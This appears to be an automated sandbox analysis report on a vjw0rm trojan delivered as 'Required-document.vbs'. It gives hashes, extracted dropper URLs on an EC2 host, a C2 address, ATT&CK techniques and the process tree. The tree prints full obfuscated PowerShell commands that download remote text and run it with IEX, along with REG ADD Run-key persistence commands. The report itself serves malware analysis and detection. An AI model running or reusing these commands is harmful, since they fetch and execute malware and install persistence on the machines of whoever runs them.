vjw0rm | 1836bc14a38837046d3937aef05eee266da919d296cfab066317b0db4ba48d21

Analysis

max time kernel
267s
max time network
1098s
platform
windows7_x64
resource
win7-20220223-en
submitted
27-02-2022 13:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Required-document.vbs
Size

59KB
MD5

a3b2efc3e12c3dd4f6c343d8e768a01c
SHA1

72cdb5d6fd134ec0920cb8b4342adf0e3a961025
SHA256

1836bc14a38837046d3937aef05eee266da919d296cfab066317b0db4ba48d21
SHA512

089140d2a092c8737aea06e959e06d674addba76a2be4114540a9616d450f5890d888624fcf73129e16801c97a5bd1be39544ccacb26e7f471f25b860f4b3e03

Score

10^/10

vjw0rm persistence trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://ec2-3-235-29-66.compute-1.amazonaws.com/wrold/LM.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://ec2-3-235-29-66.compute-1.amazonaws.com/windows/Filnal.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://ec2-3-235-29-66.compute-1.amazonaws.com/test/AAA.txt

Extracted

Family

vjw0rm

http://invoice-update.myiphost.com:1188

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

5 1088 powershell.exe
7 1980 powershell.exe
8 1088 powershell.exe
16 876 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

Untitled.exe

pid process

576 Untitled.exe
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

852 powershell.exe

flow	pid	process
5	1088	powershell.exe
7	1980	powershell.exe
8	1088	powershell.exe
16	876	powershell.exe

pid	process
576	Untitled.exe

pid	process
852	powershell.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Software\Microsoft\Windows\CurrentVersion\Run\1 = "C:\\ProgramData\\Twitter\\log\\Untitled.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Software\Microsoft\Windows\CurrentVersion\Run\2 = "C:\\Windows\\System32\\cmd.exe '/c powershell -windo 1 -noexit -exec bypass -file C:\\ProgramData\\Twitter\\log\\look.ps1"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1088	powershell.exe
1980	powershell.exe
1088	powershell.exe
1088	powershell.exe
1436	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
876	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

WScript.execmd.execmd.exepowershell.exepowershell.exeWScript.execmd.exepowershell.exeUntitled.exeWScript.execmd.exe

description	pid	process	target process
PID 1668 wrote to memory of 1084	1668	WScript.exe	cmd.exe
PID 1668 wrote to memory of 1084	1668	WScript.exe	cmd.exe
PID 1668 wrote to memory of 1084	1668	WScript.exe	cmd.exe
PID 1084 wrote to memory of 1088	1084	cmd.exe	powershell.exe
PID 1084 wrote to memory of 1088	1084	cmd.exe	powershell.exe
PID 1084 wrote to memory of 1088	1084	cmd.exe	powershell.exe
PID 1668 wrote to memory of 1716	1668	WScript.exe	cmd.exe
PID 1668 wrote to memory of 1716	1668	WScript.exe	cmd.exe
PID 1668 wrote to memory of 1716	1668	WScript.exe	cmd.exe
PID 1716 wrote to memory of 1980	1716	cmd.exe	powershell.exe
PID 1716 wrote to memory of 1980	1716	cmd.exe	powershell.exe
PID 1716 wrote to memory of 1980	1716	cmd.exe	powershell.exe
PID 1088 wrote to memory of 968	1088	powershell.exe	WScript.exe
PID 1088 wrote to memory of 968	1088	powershell.exe	WScript.exe
PID 1088 wrote to memory of 968	1088	powershell.exe	WScript.exe
PID 1980 wrote to memory of 1436	1980	powershell.exe	powershell.exe
PID 1980 wrote to memory of 1436	1980	powershell.exe	powershell.exe
PID 1980 wrote to memory of 1436	1980	powershell.exe	powershell.exe
PID 968 wrote to memory of 1704	968	WScript.exe	cmd.exe
PID 968 wrote to memory of 1704	968	WScript.exe	cmd.exe
PID 968 wrote to memory of 1704	968	WScript.exe	cmd.exe
PID 1704 wrote to memory of 560	1704	cmd.exe	reg.exe
PID 1704 wrote to memory of 560	1704	cmd.exe	reg.exe
PID 1704 wrote to memory of 560	1704	cmd.exe	reg.exe
PID 1704 wrote to memory of 792	1704	cmd.exe	reg.exe
PID 1704 wrote to memory of 792	1704	cmd.exe	reg.exe
PID 1704 wrote to memory of 792	1704	cmd.exe	reg.exe
PID 1088 wrote to memory of 852	1088	powershell.exe	powershell.exe
PID 1088 wrote to memory of 852	1088	powershell.exe	powershell.exe
PID 1088 wrote to memory of 852	1088	powershell.exe	powershell.exe
PID 852 wrote to memory of 576	852	powershell.exe	Untitled.exe
PID 852 wrote to memory of 576	852	powershell.exe	Untitled.exe
PID 852 wrote to memory of 576	852	powershell.exe	Untitled.exe
PID 852 wrote to memory of 576	852	powershell.exe	Untitled.exe
PID 576 wrote to memory of 1744	576	Untitled.exe	WScript.exe
PID 576 wrote to memory of 1744	576	Untitled.exe	WScript.exe
PID 576 wrote to memory of 1744	576	Untitled.exe	WScript.exe
PID 1744 wrote to memory of 1616	1744	WScript.exe	cmd.exe
PID 1744 wrote to memory of 1616	1744	WScript.exe	cmd.exe
PID 1744 wrote to memory of 1616	1744	WScript.exe	cmd.exe
PID 1616 wrote to memory of 876	1616	cmd.exe	powershell.exe
PID 1616 wrote to memory of 876	1616	cmd.exe	powershell.exe
PID 1616 wrote to memory of 876	1616	cmd.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Required-document.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/wrold/LM.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
2⤵
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/wrold/LM.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\23.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Public\23.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\ProgramData\Twitter\log\Untitled.exe"
6⤵
- Adds Run key to start application
PID:560

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Twitter\log\look.ps1"
6⤵
- Adds Run key to start application
PID:792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted C:\ProgramData\Twitter\log\look.ps1
4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:852

C:\ProgramData\Twitter\log\Untitled.exe
"C:\ProgramData\Twitter\log\Untitled.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NAOPEWNHTS.vbs"
6⤵
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/test/AAA.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
7⤵
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/test/AAA.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/windows/Filnal.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
2⤵
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/windows/Filnal.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted C:\Users\Public\Untitled.ps1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Twitter\log\Untitled.exe
MD5
c71711d472a03ef3de8bd0c685394ef5

SHA1
178724041e00a3e607bae8dda8cec86761dd7250

SHA256
fc64e7337e23dc861c4b4a4bbe26189cb388add1ed27198779c701e6ab1cc2b6

SHA512
f50a3752702266d6f7635c86de9aee0bc53cb6ab64b5f29903da964c50afd5a5d19d043ae886ff1865d1790cc5ac7f9cffd5d67735c2138613d1b9e3dbc3b299

Download Submit
C:\ProgramData\Twitter\log\Untitled.exe
MD5
c71711d472a03ef3de8bd0c685394ef5

SHA1
178724041e00a3e607bae8dda8cec86761dd7250

SHA256
fc64e7337e23dc861c4b4a4bbe26189cb388add1ed27198779c701e6ab1cc2b6

SHA512
f50a3752702266d6f7635c86de9aee0bc53cb6ab64b5f29903da964c50afd5a5d19d043ae886ff1865d1790cc5ac7f9cffd5d67735c2138613d1b9e3dbc3b299

Download Submit
C:\ProgramData\Twitter\log\Untitled.exe.manifest
MD5
24f26c688abc0b914c8a030d15d24383

SHA1
84a2de81580d9eed74cd8bab29f9da8ac35ef01a

SHA256
4e52f56369c1236be30e8a38014eef0340fee807a2829d47304265788d81ea88

SHA512
50d2c9da22f0962c39283e4f5e2b239fb1464c3ae77db1db776f51b3e36162be510c96164ed22e0b6e66f017fdb33aafc9f1279f4ce6b864af99341c55d5e73f

Download Submit
C:\ProgramData\Twitter\log\look.ps1
MD5
227e61b8819336b4b01e6f30a3329217

SHA1
c17c543e9edfd01a6e82bdba1bb819e467063f30

SHA256
2704b0a8a0518e0b4f17283b6c30082cfce0dfb5d05e689dea99b98c97643f42

SHA512
b02fc60caf4966e793a3931348ec925fbb56ced59eee0164b2b8adf8aac774aa53a6c5e7649735138a13791bf44f923c4b3ed0f80c3877afb6f491bc13e51bb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\NAOPEWNHTS.vbs
MD5
b6558fed278512b707b17c1fcb2a20fc

SHA1
76c961222b629a3e2fbe94480f32c7db9d23e905

SHA256
1a8ee64bf91f43b40d3a7d7ecab82e9ae60aa8b6b59ed4bebceff0b84824cae9

SHA512
2ca44ec2aad944c9e12f3514ed2d25dbed27c0b257af32a7cf0e86314402b2a0921cb0f175275cad4c2fa0232361633ecd994bf9faf6d9b03c6186e77f733437

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
ed1d20f70037bd96b6854313b00933e3

SHA1
3de9f6c709f155dbd867fe2fa0c002db80d3299c

SHA256
863be412c22a7bfb420fa6eb3f2c40b92e41b9cbd82874d693d39dd120b273ab

SHA512
6f2e4a2454c8c7a5e70630220d0d970c24b5720dba30ebce18386f204dcd8598fee552571a46d70ab4453bff5dd21b1ecf9754cec72e355a7d1f09175c4fc84f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
ed1d20f70037bd96b6854313b00933e3

SHA1
3de9f6c709f155dbd867fe2fa0c002db80d3299c

SHA256
863be412c22a7bfb420fa6eb3f2c40b92e41b9cbd82874d693d39dd120b273ab

SHA512
6f2e4a2454c8c7a5e70630220d0d970c24b5720dba30ebce18386f204dcd8598fee552571a46d70ab4453bff5dd21b1ecf9754cec72e355a7d1f09175c4fc84f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
aed32601a60211196e322d677569b07f

SHA1
5481123bd0d634a11405dfc602bf1e8607da78c3

SHA256
6149da27fd0e5099ca63713ac2f91b77b06be81b2e4e08fe2240420594eeae6e

SHA512
f30a1503948132e78782e5d6d4d461648602efcde7ae8dcebf11f90cbacc8493c97172dd5b18c14712c29ff00957f1dfdd1a74d6613733c035da9f271162c23b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
4bb81e527664963c4c85cdbd2aee0da1

SHA1
27d264706d2ac73da7dedc19d15aa4c21a8b7a97

SHA256
e9849ee52123f6b66045f07b804b19b550fc3137c23970913c7bf2e36e87cc4f

SHA512
6987dc8d82ede194fc48677166971108addb89c48d3195f6b06779d8e32573abdc744fb45f772e89c8e9d85069a1d800d3d534dd6ee32dba719a3b96992bf112

Download Submit
C:\Users\Public\23.bat
MD5
97d1cb05e43bc857bd4de542d6933bdd

SHA1
3aa05c6d757ca70caae321c831597fc4b6dc57b0

SHA256
8a5cad5cd1a1bda2ff5b17b565f122d933edd0c85ffa2b4da3540fccfb3e55e9

SHA512
0af9e30eae0f4eccb952bc755c12a645dc3623836c129f2497f3199e1c922523196e90821327bdbb381fee9229daacb77ffa9c5b848a955cc890f46c7a656b9d

Download Submit
C:\Users\Public\23.vbs
MD5
622e55a91482a6fb74ed2ce2f63eb5fe

SHA1
ce8a72f443a970cecd70716e1cd14e85a30f0502

SHA256
577b2b3fa0c726d53f4ca7f870fadb22fc4453519b8fd89ebb97166faa369a31

SHA512
1240cad02628b2db3da05ac4e7f5040249985043ba36aaf88123976fa25d609b215fc28196d8a5af2254be03cea81e1ab92fa29fe2e2968a21154a588a2dde08

Download Submit
C:\Users\Public\Untitled.ps1
MD5
1815297b61cb811d687e67f339188392

SHA1
d11926019c6d0d9938dbea12b6c836f1bf274b64

SHA256
5a31779c78394f5329eb60580193a8501280c434ad8b3a03c1a26b36839c1a96

SHA512
4bd22f9b7bf7986411b2f24231d396526d5814a7ae74699970cc670ae3a2ba9ef06efb3ea04dc79427edacf49e275716302a2f5710279676af1d085e473eb17c

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\ProgramData\Twitter\log\Untitled.exe
MD5
c71711d472a03ef3de8bd0c685394ef5

SHA1
178724041e00a3e607bae8dda8cec86761dd7250

SHA256
fc64e7337e23dc861c4b4a4bbe26189cb388add1ed27198779c701e6ab1cc2b6

SHA512
f50a3752702266d6f7635c86de9aee0bc53cb6ab64b5f29903da964c50afd5a5d19d043ae886ff1865d1790cc5ac7f9cffd5d67735c2138613d1b9e3dbc3b299

Download Submit
memory/576-98-0x0000000000300000-0x0000000000301000-memory.dmp

Filesize
4KB

Download
memory/852-97-0x0000000001F7B000-0x0000000001F9A000-memory.dmp

Filesize
124KB

Download
memory/852-86-0x000007FEF3990000-0x000007FEF44ED000-memory.dmp

Filesize
11.4MB

Download
memory/852-90-0x0000000001F74000-0x0000000001F77000-memory.dmp

Filesize
12KB

Download
memory/852-91-0x000000001B850000-0x000000001BB4F000-memory.dmp

Filesize
3.0MB

Download
memory/852-89-0x0000000001F72000-0x0000000001F74000-memory.dmp

Filesize
8KB

Download
memory/852-88-0x0000000001F70000-0x0000000001F72000-memory.dmp

Filesize
8KB

Download
memory/852-87-0x000007FEF60BE000-0x000007FEF60BF000-memory.dmp

Filesize
4KB

Download
memory/876-109-0x000000000279B000-0x00000000027BA000-memory.dmp

Filesize
124KB

Download
memory/876-108-0x0000000002794000-0x0000000002797000-memory.dmp

Filesize
12KB

Download
memory/876-105-0x000007FEF60BE000-0x000007FEF60BF000-memory.dmp

Filesize
4KB

Download
memory/876-107-0x0000000002792000-0x0000000002794000-memory.dmp

Filesize
8KB

Download
memory/876-106-0x0000000002790000-0x0000000002792000-memory.dmp

Filesize
8KB

Download
memory/876-104-0x000007FEF3990000-0x000007FEF44ED000-memory.dmp

Filesize
11.4MB

Download
memory/1088-57-0x000007FEF60BE000-0x000007FEF60BF000-memory.dmp

Filesize
4KB

Download
memory/1088-59-0x000007FEF60BE000-0x000007FEF60BF000-memory.dmp

Filesize
4KB

Download
memory/1088-63-0x00000000024EB000-0x000000000250A000-memory.dmp

Filesize
124KB

Download
memory/1088-62-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/1088-60-0x00000000024E2000-0x00000000024E4000-memory.dmp

Filesize
8KB

Download
memory/1088-56-0x000007FEF3990000-0x000007FEF44ED000-memory.dmp

Filesize
11.4MB

Download
memory/1088-61-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1088-58-0x00000000024E0000-0x00000000024E2000-memory.dmp

Filesize
8KB

Download
memory/1436-76-0x000007FEF60BE000-0x000007FEF60BF000-memory.dmp

Filesize
4KB

Download
memory/1436-77-0x000000000261B000-0x000000000263A000-memory.dmp

Filesize
124KB

Download
memory/1436-79-0x0000000002612000-0x0000000002614000-memory.dmp

Filesize
8KB

Download
memory/1436-78-0x0000000002610000-0x0000000002612000-memory.dmp

Filesize
8KB

Download
memory/1436-80-0x0000000002614000-0x0000000002617000-memory.dmp

Filesize
12KB

Download
memory/1436-75-0x000007FEF3990000-0x000007FEF44ED000-memory.dmp

Filesize
11.4MB

Download
memory/1668-54-0x000007FEFC331000-0x000007FEFC333000-memory.dmp

Filesize
8KB

Download
memory/1980-71-0x000000000254B000-0x000000000256A000-memory.dmp

Filesize
124KB

Download
memory/1980-70-0x0000000002544000-0x0000000002547000-memory.dmp

Filesize
12KB

Download
memory/1980-67-0x000007FEF60BE000-0x000007FEF60BF000-memory.dmp

Filesize
4KB

Download
memory/1980-68-0x0000000002540000-0x0000000002542000-memory.dmp

Filesize
8KB

Download
memory/1980-69-0x0000000002542000-0x0000000002544000-memory.dmp

Filesize
8KB

Download
memory/1980-66-0x000007FEF3990000-0x000007FEF44ED000-memory.dmp

Filesize
11.4MB

Download